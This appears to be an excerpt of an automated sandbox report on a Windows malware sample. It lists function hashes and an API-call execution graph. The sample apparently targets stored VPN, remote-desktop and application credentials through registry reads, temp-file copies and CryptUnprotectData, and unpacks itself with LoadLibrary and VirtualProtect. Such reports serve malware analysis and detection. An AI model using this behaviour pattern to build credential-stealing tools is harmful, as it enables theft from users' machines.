                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                                                                            • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                                                                            • API String ID: 784796242-1893226844
                                                                                                                            • Opcode ID: 56f71f68fbf130069fe557fb8e3a7c8bf433f458dc10dc9b1a9b8d1950a128cc
                                                                                                                            • Instruction ID: 4f65549979f6463c9b60bb3e22d97bf3ef3ed00229ad2a1ab00b18c8fb6df729
                                                                                                                            • Opcode Fuzzy Hash: 56f71f68fbf130069fe557fb8e3a7c8bf433f458dc10dc9b1a9b8d1950a128cc
                                                                                                                            • Instruction Fuzzy Hash: 75118E116486A240DA30BF69E8953FAE360EF84BE0F841531FB9D4B6BADE2CD104C710
                                                                                                                            Function 00007FF7CBCACBF4 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$CloseOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1701607978-0
                                                                                                                            • Opcode ID: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
                                                                                                                            • Instruction ID: f5cdc763a5b77a46ce58c44edc250efd76d136808dae1c1be8ec4184ae9e8fa4
                                                                                                                            • Opcode Fuzzy Hash: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
                                                                                                                            • Instruction Fuzzy Hash: 03216933618B9582D7208F15E48476AB7B4F788B84F540236EB8C43B28CF3DD559CB00
                                                                                                                            Function 00007FF7CBCAE4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$AppendPathlstrcpy
                                                                                                                            • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                                                                            • API String ID: 19203174-1233151749
                                                                                                                            • Opcode ID: 0d695f50cfbc54c939f23020370ed581918cd74b60817dfd48474a5e17f4269d
                                                                                                                            • Instruction ID: b7c4221d4cdb8c629e0419d663d44481bc8bf9d7e41ce2d1335963e4f561f03a
                                                                                                                            • Opcode Fuzzy Hash: 0d695f50cfbc54c939f23020370ed581918cd74b60817dfd48474a5e17f4269d
                                                                                                                            • Instruction Fuzzy Hash: 1621DF61628A9285DB30FF66D8502EEA360FB88BD0F840531FB5D4B7A9DE3CC604C710
                                                                                                                            Function 00007FF7CBCAFDE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentVariableW.KERNEL32 ref: 00007FF7CBCAFE11
                                                                                                                            • lstrcatW.KERNEL32 ref: 00007FF7CBCAFE1E
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: lstrlenW.KERNEL32 ref: 00007FF7CBCAFF62
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: lstrlenW.KERNEL32 ref: 00007FF7CBCAFF7E
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: WideCharToMultiByte.KERNEL32 ref: 00007FF7CBCAFFA7
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: PathFileExistsA.SHLWAPI ref: 00007FF7CBCAFFB0
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: OpenFile.KERNEL32 ref: 00007FF7CBCAFFC9
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: GetFileSize.KERNEL32 ref: 00007FF7CBCAFFE9
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: CreateFileMappingA.KERNEL32 ref: 00007FF7CBCB0020
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: MapViewOfFile.KERNEL32 ref: 00007FF7CBCB0041
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: __memcpy.DELAYIMP ref: 00007FF7CBCB0053
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: UnmapViewOfFile.KERNEL32 ref: 00007FF7CBCB005E
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: CloseHandle.KERNEL32 ref: 00007FF7CBCB0067
                                                                                                                              • Part of subcall function 00007FF7CBCAFF3C: CloseHandle.KERNEL32 ref: 00007FF7CBCB0070
                                                                                                                              • Part of subcall function 00007FF7CBCAF280: __memcpy.DELAYIMP ref: 00007FF7CBCAF29E
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                                                                            • String ID: APPDATA
                                                                                                                            • API String ID: 2395011915-4054820676
                                                                                                                            • Opcode ID: cec1ab9afa3ae12122d372c36ef716b8056693dd0c9b4a40219edd8f34d93ed0
                                                                                                                            • Instruction ID: 7f210e618221ce93b2fc6cad54b7190bb3be6df8277cfd831fe4efb0b1c1976d
                                                                                                                            • Opcode Fuzzy Hash: cec1ab9afa3ae12122d372c36ef716b8056693dd0c9b4a40219edd8f34d93ed0
                                                                                                                            • Instruction Fuzzy Hash: 07113A22628A5691EF20EF19E4445EEB361FB847A4FC44431FB8D87A69EF3CD509C760

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:47.8%
                                                                                                                            Signature Coverage:3.6%
                                                                                                                            Total number of Nodes:692
                                                                                                                            Total number of Limit Nodes:83
                                                                                                                            execution_graph 27219 433c40 27255 431b6a 27219->27255 27221 433c50 27222 433dfa 27221->27222 27261 431000 GetProcessHeap RtlAllocateHeap 27221->27261 27224 433c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27262 484bec 27224->27262 27226 433dec DeleteFileW 27273 431011 27226->27273 27228 433c9a 27228->27226 27229 433de3 27228->27229 27278 431000 GetProcessHeap RtlAllocateHeap 27228->27278 27286 483848 27229->27286 27232 433cce 27279 4502ec 92 API calls 27232->27279 27234 433da8 27282 44fb92 91 API calls 27234->27282 27235 431fa7 19 API calls 27238 433cd9 27235->27238 27237 433db1 lstrlen 27239 433db9 27237->27239 27240 433ddc 27237->27240 27238->27234 27238->27235 27245 433d2b lstrlen 27238->27245 27280 431000 GetProcessHeap RtlAllocateHeap 27238->27280 27281 4502ec 92 API calls 27238->27281 27283 431798 lstrlen 27239->27283 27242 431011 3 API calls 27240->27242 27242->27229 27243 433dc8 27284 431798 lstrlen 27243->27284 27245->27238 27246 433d35 lstrlen 27245->27246 27246->27238 27247 433dd2 27285 431798 lstrlen 27247->27285 27251 433d46 wsprintfA lstrlen 27252 433d83 lstrcat 27251->27252 27253 433d71 27251->27253 27254 431011 3 API calls 27252->27254 27253->27252 27254->27238 27256 431b99 27255->27256 27257 431b6f 27255->27257 27256->27221 27257->27256 27258 431b76 CreateFileW 27257->27258 27259 431b95 27258->27259 27260 431b8d CloseHandle 27258->27260 27259->27221 27260->27259 27261->27224 27289 48307c 27262->27289 27264 484c01 27271 484c44 27264->27271 27299 44c54d memset 27264->27299 27266 484c18 27300 44c871 21 API calls 27266->27300 27268 484c2a 27301 44c518 19 API calls 27268->27301 27270 484c33 27270->27271 27302 48486f 87 API calls 27270->27302 27271->27228 27324 431162 VirtualQuery 27273->27324 27276 43102d 27276->27222 27277 43101d GetProcessHeap RtlFreeHeap 27277->27276 27278->27232 27279->27238 27280->27251 27281->27238 27282->27237 27283->27243 27284->27247 27285->27240 27326 4837cb 27286->27326 27290 483095 27289->27290 27298 48308e 27289->27298 27291 4830ad 27290->27291 27316 4366ce 17 API calls 27290->27316 27293 4830ed memset 27291->27293 27291->27298 27294 483108 27293->27294 27295 483116 27294->27295 27317 43c59d 17 API calls 27294->27317 27295->27298 27303 436512 27295->27303 27298->27264 27299->27266 27300->27268 27301->27270 27302->27271 27318 43685c 27303->27318 27305 43651d 27305->27298 27306 436519 27306->27305 27307 43bfec GetSystemInfo 27306->27307 27321 4365bd 27307->27321 27309 43c00e 27310 4365bd 16 API calls 27309->27310 27311 43c01a 27310->27311 27312 4365bd 16 API calls 27311->27312 27313 43c026 27312->27313 27314 4365bd 16 API calls 27313->27314 27315 43c032 27314->27315 27315->27298 27316->27291 27317->27295 27319 48307c 17 API calls 27318->27319 27320 436861 27319->27320 27320->27306 27322 48307c 17 API calls 27321->27322 27323 4365c2 27322->27323 27323->27309 27325 431019 27324->27325 27325->27276 27325->27277 27327 4837d6 27326->27327 27337 4837e9 27326->27337 27338 4395b5 17 API calls 27327->27338 27329 4837db 27330 4837eb 27329->27330 27331 4837df 27329->27331 27333 483834 27330->27333 27335 48381f 27330->27335 27339 484da0 17 API calls 27331->27339 27341 483865 69 API calls 27333->27341 27340 438795 22 API calls 27335->27340 27337->27226 27338->27329 27339->27337 27340->27337 27341->27337 27959 434440 24 API calls 27960 456440 92 API calls 28065 499238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28067 4513ca 100 API calls 27962 477452 19 API calls 28068 435e5a 28 API calls 27737 43105d VirtualFree 27964 472864 25 API calls 28072 463e6b 20 API calls 27966 44f86a 30 API calls 27967 434c6d 17 API calls 27972 456871 8 API calls 28075 456e71 20 API calls 27973 48507d 24 API calls 28076 450670 _allmul _allmul _allmul _alldvrm 27974 44807c 23 API calls 27975 43b079 20 API calls 28078 43ca01 _allmul _alldiv _allmul _alldiv 27342 434406 27347 432e30 StrStrIW 27342->27347 27345 432e30 22 API calls 27346 43443a 27345->27346 27348 432e57 27347->27348 27349 432ebc 27347->27349 27384 4319e5 27348->27384 27373 431000 GetProcessHeap RtlAllocateHeap 27349->27373 27353 432ed0 RegOpenKeyExW 27354 432f68 27353->27354 27368 432eee 27353->27368 27355 431011 3 API calls 27354->27355 27358 432f6f 27355->27358 27357 432f50 RegEnumKeyExW 27359 432f5e RegCloseKey 27357->27359 27357->27368 27358->27345 27359->27354 27360 432eb5 27364 431011 3 API calls 27360->27364 27361 432e75 27361->27360 27399 431afe 27361->27399 27364->27349 27367 432e91 27371 431011 3 API calls 27367->27371 27368->27357 27370 432e30 18 API calls 27368->27370 27372 431011 3 API calls 27368->27372 27374 431953 27368->27374 27379 43199d 27368->27379 27369 43199d 9 API calls 27369->27367 27370->27368 27371->27360 27372->27368 27373->27353 27375 431964 lstrlenW lstrlenW 27374->27375 27407 431000 GetProcessHeap RtlAllocateHeap 27375->27407 27378 431986 lstrcatW lstrcatW 27378->27368 27380 431953 6 API calls 27379->27380 27381 4319a6 27380->27381 27382 431011 3 API calls 27381->27382 27383 4319af 27382->27383 27383->27368 27385 4319f7 27384->27385 27386 4319fa RegOpenKeyExW 27384->27386 27385->27386 27387 431aa2 27386->27387 27388 431a28 RegQueryValueExW 27386->27388 27389 431ab9 27387->27389 27391 4319e5 5 API calls 27387->27391 27390 431a94 RegCloseKey 27388->27390 27392 431a46 27388->27392 27389->27349 27398 431bc5 10 API calls 27389->27398 27390->27387 27390->27389 27391->27389 27392->27390 27408 431000 GetProcessHeap RtlAllocateHeap 27392->27408 27394 431a61 RegQueryValueExW 27395 431a8b 27394->27395 27396 431a7f 27394->27396 27397 431011 3 API calls 27395->27397 27396->27390 27397->27396 27398->27361 27409 431000 GetProcessHeap RtlAllocateHeap 27399->27409 27401 431b0d SHGetFolderPathW 27402 431b20 27401->27402 27403 431b63 27401->27403 27404 431011 3 API calls 27402->27404 27403->27367 27403->27369 27405 431b28 27404->27405 27405->27403 27406 4319e5 9 API calls 27405->27406 27406->27405 27407->27378 27408->27394 27409->27401 27981 469000 28 API calls 27982 475401 memset memcpy memcpy memset memcpy 28079 450e0c 22 API calls 27417 43a40e 27419 43a426 27417->27419 27425 43a4a2 27417->27425 27418 43a469 memcpy 27418->27425 27419->27418 27420 43a44a memcpy 27419->27420 27419->27425 27421 43a45d 27420->27421 27422 43a524 27430 43a2aa 17 API calls 27422->27430 27424 43a532 27424->27421 27426 43a53e memset 27424->27426 27425->27422 27427 43a501 27425->27427 27426->27421 27429 43a1c6 18 API calls 27427->27429 27429->27421 27430->27424 28082 45f21c 23 API calls 27985 43581f _alldiv _allrem _allmul 27986 46e024 91 API calls 27988 43482b 14 API calls 27817 43f433 27818 43f445 27817->27818 27823 4423b9 27818->27823 27821 43f47c 27822 43f490 27821->27822 27831 43e206 56 API calls 27821->27831 27824 4423d3 27823->27824 27827 442473 27823->27827 27826 442431 27824->27826 27835 443451 41 API calls 27824->27835 27826->27827 27832 4363f7 27826->27832 27827->27821 27829 44240f 27829->27826 27836 44235a 17 API calls 27829->27836 27831->27822 27834 43bafc 20 API calls 27832->27834 27833 436400 27833->27827 27834->27833 27835->27829 27836->27826 27994 44943d 33 API calls 27995 4834ca 55 API calls 27996 435cc5 22 API calls 27997 436eb7 22 API calls 27999 445cca 31 API calls 28092 45faca _allmul strcspn 28004 4670de 24 API calls 28097 45c6da 23 API calls 27811 439ee8 27812 439ef1 RtlFreeHeap 27811->27812 27813 439f1a 27811->27813 27812->27813 27814 439f02 27812->27814 27816 437f70 17 API calls 27814->27816 27816->27813 28007 43f4ec 20 API calls 28099 469ef6 112 API calls 28008 434cf5 memset 27918 4328f8 27919 432900 27918->27919 27920 432ac8 27918->27920 27950 431000 GetProcessHeap RtlAllocateHeap 27919->27950 27921 483848 74 API calls 27920->27921 27923 432ad1 DeleteFileW 27921->27923 27925 431011 3 API calls 27923->27925 27924 43290e 27951 4502ec 92 API calls 27924->27951 27927 432adf 27925->27927 27929 432919 27939 431fa7 19 API calls 27929->27939 27940 4329da lstrlen 27929->27940 27944 432a8b 27929->27944 27952 431000 GetProcessHeap RtlAllocateHeap 27929->27952 27953 432112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27929->27953 27954 4502ec 92 API calls 27929->27954 27930 432a98 lstrlen 27931 432ac1 27930->27931 27932 432aa4 27930->27932 27933 431011 3 API calls 27931->27933 27956 431798 lstrlen 27932->27956 27933->27920 27935 432ab1 27957 431798 lstrlen 27935->27957 27937 432ab9 27958 431798 lstrlen 27937->27958 27939->27929 27940->27929 27941 4329eb lstrlen 27940->27941 27941->27929 27955 44fb92 91 API calls 27944->27955 27946 432a25 wsprintfA lstrlen 27947 432a6a lstrcat 27946->27947 27948 432a58 27946->27948 27949 431011 3 API calls 27947->27949 27948->27947 27949->27929 27950->27924 27951->27929 27952->27929 27953->27946 27954->27929 27955->27930 27956->27935 27957->27937 27958->27931 28100 440284 37 API calls 28010 47348f 27 API calls 28016 472c9e 103 API calls 28106 43629a 23 API calls 27551 433098 27552 431b6a 2 API calls 27551->27552 27554 4330af 27552->27554 27553 4333a9 27554->27553 27575 431000 GetProcessHeap RtlAllocateHeap 27554->27575 27556 4330ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27557 484bec 87 API calls 27556->27557 27560 433126 27557->27560 27558 43339b DeleteFileW 27559 431011 3 API calls 27558->27559 27559->27553 27560->27558 27561 433392 27560->27561 27576 4502ec 92 API calls 27560->27576 27563 483848 74 API calls 27561->27563 27563->27558 27565 431fa7 19 API calls 27574 433155 27565->27574 27566 4332cd CryptUnprotectData 27566->27574 27567 43319c RtlCompareMemory 27567->27566 27567->27574 27569 433381 27579 44fb92 91 API calls 27569->27579 27570 4331d0 RtlZeroMemory 27577 431000 GetProcessHeap RtlAllocateHeap 27570->27577 27572 431011 3 API calls 27572->27574 27573 431798 lstrlen 27573->27574 27574->27565 27574->27566 27574->27567 27574->27569 27574->27570 27574->27572 27574->27573 27578 4502ec 92 API calls 27574->27578 27575->27556 27576->27574 27577->27574 27578->27574 27579->27561 28108 446698 29 API calls 28110 4356a2 _allrem 28017 44b8a6 88 API calls 28018 457ca6 19 API calls 27788 439ea7 RtlAllocateHeap 27789 439ec1 27788->27789 27790 439ed9 27788->27790 27792 437f70 17 API calls 27789->27792 27792->27790 27793 432ea5 25 API calls 27794 4324a4 27797 432198 RtlZeroMemory GetVersionExW 27794->27797 27798 4321cb LoadLibraryW 27797->27798 27800 43249b 27798->27800 27801 4321fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27798->27801 27802 432492 FreeLibrary 27801->27802 27810 432244 27801->27810 27802->27800 27803 43247b 27803->27802 27804 4322e1 RtlCompareMemory 27804->27810 27805 432365 RtlCompareMemory 27805->27810 27806 431953 6 API calls 27806->27810 27807 431011 GetProcessHeap RtlFreeHeap VirtualQuery 27807->27810 27808 4323f8 StrStrIW 27808->27810 27809 4317c0 9 API calls 27809->27810 27810->27802 27810->27803 27810->27804 27810->27805 27810->27806 27810->27807 27810->27808 27810->27809 28019 44b0aa 82 API calls 28020 4348b1 22 API calls 28021 436eb7 24 API calls 27842 432cb5 27843 432cbe 27842->27843 27844 431953 6 API calls 27843->27844 27845 432cc3 27844->27845 27846 432e17 27845->27846 27847 431953 6 API calls 27845->27847 27848 432cd9 27847->27848 27871 431000 GetProcessHeap RtlAllocateHeap 27848->27871 27850 432ce9 27872 431000 GetProcessHeap RtlAllocateHeap 27850->27872 27852 432cf9 27853 431b6a 2 API calls 27852->27853 27854 432d04 27853->27854 27855 432ded 27854->27855 27856 432d0c GetPrivateProfileSectionNamesW 27854->27856 27857 431011 3 API calls 27855->27857 27856->27855 27869 432d22 27856->27869 27858 432e02 27857->27858 27859 431011 3 API calls 27858->27859 27861 432e09 27859->27861 27860 432d3f StrStrIW 27862 432d53 GetPrivateProfileStringW 27860->27862 27863 432dd7 lstrlenW 27860->27863 27864 431011 3 API calls 27861->27864 27862->27863 27865 432d72 GetPrivateProfileIntW 27862->27865 27863->27855 27863->27869 27866 432e10 27864->27866 27865->27869 27867 431011 3 API calls 27866->27867 27867->27846 27868 431953 6 API calls 27868->27869 27869->27855 27869->27860 27869->27863 27869->27868 27870 431011 3 API calls 27869->27870 27870->27869 27871->27850 27872->27852 28115 4513ca 87 API calls 28022 4513ca 85 API calls 28023 4478b9 32 API calls 28116 4512bb _allmul _allmul _allmul _alldvrm _allmul 28117 4396bc _alldiv _alldiv _alldiv _alldiv _allmul 28025 45e141 18 API calls 28119 456340 90 API calls 28120 44f74d 18 API calls 28026 43a558 18 API calls 28027 45e558 22 API calls 28123 457f67 23 API calls 28124 467762 memset memset memcpy 28029 465d6f 20 API calls 28030 44a16f 32 API calls 28126 43ab68 21 API calls 27837 432f77 27838 432e30 22 API calls 27837->27838 27839 432f9a 27838->27839 27840 432e30 22 API calls 27839->27840 27841 432fab 27840->27841 28033 44c97b memcpy 28129 466f06 24 API calls 28035 446d01 _allmul 27431 499304 27432 499344 27431->27432 27433 4994da LoadLibraryA 27432->27433 27436 49951f VirtualProtect VirtualProtect 27432->27436 27437 499584 27432->27437 27434 4994f1 27433->27434 27434->27432 27438 499503 GetProcAddress 27434->27438 27436->27437 27437->27437 27438->27434 27439 499519 27438->27439 28131 455f08 100 API calls 28132 456b14 memset memcpy _allmul 27440 433717 27441 431b6a 2 API calls 27440->27441 27443 43372e 27441->27443 27442 433c23 27443->27442 27490 431000 GetProcessHeap RtlAllocateHeap 27443->27490 27445 43376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27446 4337a8 27445->27446 27447 43379e 27445->27447 27449 484bec 87 API calls 27446->27449 27491 43349b 31 API calls 27447->27491 27452 4337b3 27449->27452 27450 433c15 DeleteFileW 27451 431011 3 API calls 27450->27451 27451->27442 27452->27450 27453 433c0c 27452->27453 27492 431000 GetProcessHeap RtlAllocateHeap 27452->27492 27455 483848 74 API calls 27453->27455 27455->27450 27456 4337e3 27493 4502ec 92 API calls 27456->27493 27458 433bcc 27498 44fb92 91 API calls 27458->27498 27460 433bd9 lstrlen 27461 433c05 27460->27461 27462 433be5 27460->27462 27464 431011 3 API calls 27461->27464 27499 431798 lstrlen 27462->27499 27464->27453 27466 433bf3 27500 431798 lstrlen 27466->27500 27467 433833 RtlCompareMemory 27468 433a37 CryptUnprotectData 27467->27468 27478 4337ee 27467->27478 27468->27478 27470 433bfc 27501 431798 lstrlen 27470->27501 27472 433867 RtlZeroMemory 27494 431000 GetProcessHeap RtlAllocateHeap 27472->27494 27474 431fa7 19 API calls 27474->27478 27475 431011 3 API calls 27475->27478 27476 433b0f lstrlen 27477 433b21 lstrlen 27476->27477 27476->27478 27477->27478 27478->27458 27478->27467 27478->27468 27478->27472 27478->27474 27478->27475 27478->27476 27479 431000 GetProcessHeap RtlAllocateHeap 27478->27479 27480 433987 lstrlen 27478->27480 27484 433ba3 lstrcat 27478->27484 27495 432112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27478->27495 27496 432112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27478->27496 27497 4502ec 92 API calls 27478->27497 27479->27478 27480->27478 27483 433999 lstrlen 27480->27483 27482 433b66 wsprintfA lstrlen 27482->27478 27482->27484 27483->27478 27484->27478 27486 4339de wsprintfA lstrlen 27487 433a1b lstrcat 27486->27487 27488 433a0d 27486->27488 27489 431011 3 API calls 27487->27489 27488->27487 27489->27478 27490->27445 27491->27446 27492->27456 27493->27478 27494->27478 27495->27486 27496->27482 27497->27478 27498->27460 27499->27466 27500->27470 27501->27461 27502 432b15 27503 431953 6 API calls 27502->27503 27504 432b1f FindFirstFileW 27503->27504 27506 432c5c 27504->27506 27525 432b4e 27504->27525 27507 431011 3 API calls 27506->27507 27509 432c63 27507->27509 27508 432b59 lstrcmpiW 27512 432b71 lstrcmpiW 27508->27512 27513 432c3d FindNextFileW 27508->27513 27510 431011 3 API calls 27509->27510 27514 432c6a 27510->27514 27511 431953 6 API calls 27511->27525 27512->27513 27512->27525 27515 432c51 FindClose 27513->27515 27513->27525 27515->27506 27516 43199d 9 API calls 27518 432bdf StrStrIW 27516->27518 27519 432c10 StrStrIW 27518->27519 27522 432bf1 27518->27522 27519->27522 27520 431cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27520->27522 27521 431011 3 API calls 27521->27513 27522->27519 27522->27520 27522->27521 27531 43278e 41 API calls 27522->27531 27524 43199d 9 API calls 27524->27525 27525->27508 27525->27511 27525->27516 27525->27524 27526 431011 3 API calls 27525->27526 27527 4319b4 27525->27527 27526->27525 27528 4319bc 27527->27528 27530 4319d4 27527->27530 27529 4319c3 lstrlenW 27528->27529 27528->27530 27529->27530 27530->27525 27531->27519 28038 4484a7 29 API calls 28137 47c322 27 API calls 28042 439925 18 API calls 28138 43cb2a _allmul _allmul 28139 46072d 19 API calls 28043 440128 34 API calls 28044 449534 38 API calls 28045 45f130 22 API calls 28140 44ff32 21 API calls 28141 447b3d 18 API calls 28143 440f3e 58 API calls 28046 483dc8 24 API calls 28146 4673c4 22 API calls 27410 439fc8 27411 439fd3 27410->27411 27413 439fd8 27410->27413 27412 439ff4 HeapCreate 27412->27411 27414 43a004 27412->27414 27413->27411 27413->27412 27416 437f70 17 API calls 27414->27416 27416->27411 28149 4513ca 87 API calls 27532 4343d9 27539 434317 _alloca_probe RegOpenKeyW 27532->27539 27535 434317 25 API calls 27536 4343f5 27535->27536 27537 434317 25 API calls 27536->27537 27538 434403 27537->27538 27540 434343 RegEnumKeyExW 27539->27540 27541 4343cf 27539->27541 27542 4343c4 RegCloseKey 27540->27542 27544 43436d 27540->27544 27541->27535 27542->27541 27543 431953 6 API calls 27543->27544 27544->27543 27545 43199d 9 API calls 27544->27545 27547 431011 3 API calls 27544->27547 27550 43418a 16 API calls 27544->27550 27545->27544 27548 43439b RegEnumKeyExW 27547->27548 27548->27544 27549 4343c3 27548->27549 27549->27542 27550->27544 28152 43ebd9 35 API calls 27738 4315dd 27739 4315f3 lstrlen 27738->27739 27740 431600 27738->27740 27739->27740 27749 431000 GetProcessHeap RtlAllocateHeap 27740->27749 27742 431608 lstrcat 27743 431644 27742->27743 27744 43163d lstrcat 27742->27744 27750 431333 27743->27750 27744->27743 27747 431011 3 API calls 27748 431667 27747->27748 27749->27742 27773 431000 GetProcessHeap RtlAllocateHeap 27750->27773 27752 431357 27774 43106c lstrlen MultiByteToWideChar 27752->27774 27754 431366 27775 4312a3 RtlZeroMemory 27754->27775 27757 4313b8 RtlZeroMemory 27761 4313ed 27757->27761 27758 431011 3 API calls 27759 4315d2 27758->27759 27759->27747 27760 4315b5 27760->27758 27761->27760 27777 431000 GetProcessHeap RtlAllocateHeap 27761->27777 27763 4314a7 wsprintfW 27764 4314c9 27763->27764 27772 4315a1 27764->27772 27778 431000 GetProcessHeap RtlAllocateHeap 27764->27778 27765 431011 3 API calls 27765->27760 27767 431533 27768 43159a 27767->27768 27779 43104c VirtualAlloc 27767->27779 27769 431011 3 API calls 27768->27769 27769->27772 27771 43158a RtlMoveMemory 27771->27768 27772->27765 27773->27752 27774->27754 27776 4312c5 27775->27776 27776->27757 27776->27760 27777->27763 27778->27767 27779->27771 27780 4363dd 27782 43b87b 20 API calls 27780->27782 27781 4363f4 27782->27781 28049 4399e1 strncmp 28050 4855eb IsProcessorFeaturePresent 28053 43c9ea _allmul _alldiv 28054 4349f1 13 API calls 28055 43d1f7 memset _allmul _allmul 28154 449ff0 31 API calls 28155 4513ca 70 API calls 27873 4347fa 27880 43479c 27873->27880 27876 43479c 23 API calls 27877 434813 27876->27877 27878 43479c 23 API calls 27877->27878 27879 43481f 27878->27879 27881 431afe 10 API calls 27880->27881 27882 4347af 27881->27882 27883 4347f1 27882->27883 27884 43199d 9 API calls 27882->27884 27883->27876 27885 4347bf 27884->27885 27886 4347ea 27885->27886 27889 431d4a 27885->27889 27887 431011 3 API calls 27886->27887 27887->27883 27890 431d62 27889->27890 27891 431eb4 27889->27891 27890->27891 27892 4319b4 lstrlenW 27890->27892 27891->27885 27893 431d73 27892->27893 27894 431d8b 27893->27894 27895 431d79 27893->27895 27897 431953 6 API calls 27894->27897 27896 431953 6 API calls 27895->27896 27898 431d83 27896->27898 27897->27898 27898->27891 27899 431da3 FindFirstFileW 27898->27899 27900 431ead 27899->27900 27907 431dba 27899->27907 27901 431011 3 API calls 27900->27901 27901->27891 27902 431dc5 lstrcmpiW 27904 